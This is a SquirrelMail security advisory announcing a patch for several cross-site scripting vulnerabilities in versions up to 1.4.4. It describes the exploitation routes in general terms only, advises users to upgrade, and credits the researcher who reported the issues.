Several cross site scripting vulnerabilities
- Several cross site scripting (XSS) vulnerabilties have been discovered in SquirrelMail versions 1.4.0 - 1.4.4. These have been addressed in a patch that has been uploaded to the SF.net file releases sytem. We advise all our users to apply this patch. We're also releasing SquirrelMail 1.4.5 release candidate 1 at the same time. We expect version 1.4.5 to be out within two weeks from now.
The vulnerabilities are in two categories: the majority can be exploited through URL manipulation, and some by sending a specially crafted email to a victim. When done very carefully, this can cause the session of the user to be hijacked.
We know that versions 1.4.0 to 1.4.3a are vulnerable to most of the issues. The 1.2.x series is not supported anymore; we advise users of
that series to upgrade to 1.4.4 with the patch applied.
- Affected Versions:
- <= 1.4.4
- Register Globals:
- Register_globals does not have to be on for this issue.
- CVE ID(s):
- view patch
- Martijn Brinkers for finding the majority of the issues
- This page last updated:
- 2006-07-09 15:52:28